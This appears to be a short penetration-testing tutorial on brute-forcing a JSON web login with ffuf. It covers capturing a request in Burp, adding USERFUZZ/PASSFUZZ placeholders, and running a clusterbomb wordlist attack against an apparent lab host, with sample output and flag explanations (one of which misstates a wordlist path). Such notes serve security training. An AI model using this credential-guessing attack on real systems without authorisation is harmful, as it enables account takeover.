Use FFUF to Brute Force Login
Brute Force with a Request File
- Start Burp
- Make a randomized login to the target web page
- Copy the output, for example:
POST /login HTTP/1.1
Host: 10.10.10.10
Content-Length: 37
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Content-Type: application/json
Origin: http://10.10.10.10
Referer: http://10.10.10.10/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
{"username":"admin","password":"admin"}
- Paste the contents into a file, for example
request.txt
- Replace the fields with placeholder text
POST /login HTTP/1.1
Host: 10.10.10.10
Content-Length: 37
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Content-Type: application/json
Origin: http://10.10.10.10
Referer: http://10.10.10.10/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
{"username":"USERFUZZ","password":"PASSFUZZ"}
- Save these contents to a file
- Run FFUF in
clusterbomb
mode to bruteforce the login
ffuf -request request.txt -request-proto http -mode clusterbomb -w /path/to/users/file.txt:USERFUZZ -w /path/to/password/file.txt:PASSFUZZ -mc 200
[Status: 200, Size: 2, Words: 1, Lines: 1]
* USERFUZZ: admin
* PASSFUZZ: password
In this example, we are doing the following:
-
-request request.txt
is the example request for FFUF to follow -
-request-proto
the protocol to use -
-mode clusterbomb
use clusterbomb mode with the given inputs -
-w /path/to/users/file.txt:USERFUZZ
insert the words from this word list in the"username":"USERFUZZ"
placeholder -
-w /path/to/users/file.txt:PASSFUZZ
insert the words from this word list in the"password":"PASSFUZZ"
placeholder -
-mc 200
sucessful logins will match the HTTP 200 status code